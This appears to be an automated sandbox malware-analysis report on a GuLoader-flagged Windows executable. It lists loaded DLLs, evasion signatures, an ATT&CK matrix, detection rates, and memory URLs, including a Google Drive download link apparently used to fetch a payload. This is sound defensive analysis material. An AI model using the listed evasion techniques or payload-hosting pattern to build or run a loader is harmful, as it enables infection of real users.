      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeFile written: C:\Program Files (x86)\Fljtenists.iniJump to behavior
      Source: nRNzqQOQwk.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: nRNzqQOQwk.exe, 00000001.00000001.12761978127.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: mshtml.pdbUGP source: nRNzqQOQwk.exe, 00000001.00000001.12761978127.0000000000649000.00000020.00000001.01000000.00000006.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000001.00000002.16901286727.0000000002BAB000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.13419006132.00000000041CB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeFile created: C:\Users\user\AppData\Local\Temp\nsj1A28.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeAPI/Special instruction interceptor: Address: 49F8F34
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeAPI/Special instruction interceptor: Address: 33D8F34
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj1A28.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exe TID: 6008Thread sleep time: -290000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_00405642 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405642
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_004060A4 FindFirstFileA,FindClose,0_2_004060A4
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_0040270B FindFirstFileA,0_2_0040270B
      Source: nRNzqQOQwk.exe, 00000001.00000003.15362687112.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13183348229.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16474344900.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16592400706.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13191080431.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16480720685.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14195011644.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16362162560.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15016475161.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419575411.0000000006828000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3+
      Source: nRNzqQOQwk.exe, 00000001.00000003.15362687112.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13408506429.00000000067DE000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13183348229.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13750852480.00000000067DE000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16474344900.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16592400706.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13632490262.00000000067DE000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13191080431.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13526880286.00000000067DE000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16480720685.0000000006828000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeAPI call chain: ExitProcess graph end nodegraph_0-3797
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeAPI call chain: ExitProcess graph end nodegraph_0-3977
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_00402B0E RegOpenKeyExA,RegEnumKeyA,RegEnumKeyA,RegCloseKey,LdrInitializeThunk,RegCloseKey,RegDeleteKeyA,0_2_00402B0E
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeProcess created: C:\Users\user\Desktop\nRNzqQOQwk.exe "C:\Users\user\Desktop\nRNzqQOQwk.exe"Jump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_00405DC2 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405DC2

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		12
      Masquerading      		OS Credential Dumping11
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
      Process Injection      		1
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Clipboard Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading      		1
      Access Token Manipulation      		Security Account Manager3
      File and Directory Discovery      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection      		NTDS13
      System Information Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      nRNzqQOQwk.exe67%VirustotalBrowse
      nRNzqQOQwk.exe71%ReversingLabsWin32.Trojan.Guloader
      nRNzqQOQwk.exe100%AviraTR/AD.NsisInject.monhx
      nRNzqQOQwk.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsj1A28.tmp\System.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
      http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
      https://www.gstatic.0%Avira URL Cloudsafe
      https://translate.googleapi0%Avira URL Cloudsafe
      http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		142.250.190.110
      		truefalse
        		high
        drive.usercontent.google.com
        		142.250.190.97
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://drive.google.com/;nRNzqQOQwk.exe, 00000001.00000003.13077401848.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13071150715.000000000683B000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://www.gstatic.nRNzqQOQwk.exe, 00000001.00000003.15128211863.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531873263.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16703975770.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16138447412.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14307119975.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16592400706.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15016475161.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16362162560.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419575411.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16815816874.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14904620514.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16250138301.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15691986334.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15803735270.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000002.16916696761.00000000067FC000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15362687112.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15580308822.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14195011644.00000000067F9000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14786084325.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14792916940.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15915220747.00000000067FB000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://drive.google.com/8nRNzqQOQwk.exe, 00000001.00000003.12965484524.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12959116605.000000000683B000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://translate.google.com/translate_a/element.jsnRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13296845871.0000000006828000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://drive.google.com/rnRNzqQOQwk.exe, 00000001.00000003.13408506429.00000000067DE000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13750852480.00000000067DE000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13632490262.00000000067DE000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13526880286.00000000067DE000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000002.16916541322.00000000067B8000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968737967.00000000067DE000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13183348229.00000000067DE000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13856443366.00000000067DE000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRnRNzqQOQwk.exe, 00000001.00000003.15128211863.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531873263.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16703975770.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16138447412.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14307119975.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16592400706.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15016475161.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16362162560.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419575411.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16815816874.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14904620514.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16250138301.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15691986334.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15803735270.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000002.16916696761.00000000067FC000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15362687112.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15580308822.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14195011644.00000000067F9000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14786084325.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14792916940.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15915220747.00000000067FB000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.nRNzqQOQwk.exe, 00000001.00000001.12761978127.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://drive.usercontent.google.com/nRNzqQOQwk.exe, 00000001.00000003.15128211863.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531873263.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13744599894.000000000681F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531658810.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13414803544.000000000681F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000002.16916833797.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12965484524.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12853316877.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13077401848.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14307119975.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13520406559.000000000681F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968616030.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15016475161.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419238478.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16362162560.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419575411.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16815816874.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14904620514.00000000067FB000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://nsis.sf.net/NSIS_ErrorErrornRNzqQOQwk.exe, 00000000.00000000.11813384787.0000000000409000.00000008.00000001.01000000.00000003.sdmp, nRNzqQOQwk.exe, 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpfalse
                        		high
                        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDnRNzqQOQwk.exe, 00000001.00000001.12761978127.0000000000626000.00000020.00000001.01000000.00000006.sdmpfalse
                          		high
                          https://translate.googleapinRNzqQOQwk.exe, 00000001.00000003.14419575411.0000000006828000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13520406559.0000000006828000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.gopher.ftp://ftp.nRNzqQOQwk.exe, 00000001.00000001.12761978127.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://drive.usercontent.google.com/UnRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531658810.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000002.16916833797.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12965484524.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12853316877.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13077401848.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968616030.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419238478.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419436535.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968482023.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16474207406.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13071150715.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12959116605.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16473999157.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://www.google.comnRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://drive.usercontent.google.com/JnRNzqQOQwk.exe, 00000001.00000003.13744599894.000000000681F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13414803544.000000000681F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13520406559.000000000681F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13191080431.000000000681F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13638906985.000000000681F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13862839642.000000000681F000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://drive.google.com/nynRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdnRNzqQOQwk.exe, 00000001.00000001.12761978127.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                                    		high
                                    http://nsis.sf.net/NSIS_ErrornRNzqQOQwk.exe, nRNzqQOQwk.exe, 00000000.00000000.11813384787.0000000000409000.00000008.00000001.01000000.00000003.sdmp, nRNzqQOQwk.exe, 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://drive.google.com/nRNzqQOQwk.exe, 00000001.00000003.12959116605.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16473999157.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13856443366.00000000067DE000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214nRNzqQOQwk.exe, 00000001.00000001.12761978127.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                        		high
                                        https://drive.google.com/PnRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531658810.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13077401848.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968616030.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419238478.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419436535.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968482023.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13071150715.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdnRNzqQOQwk.exe, 00000001.00000001.12761978127.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                                            		high
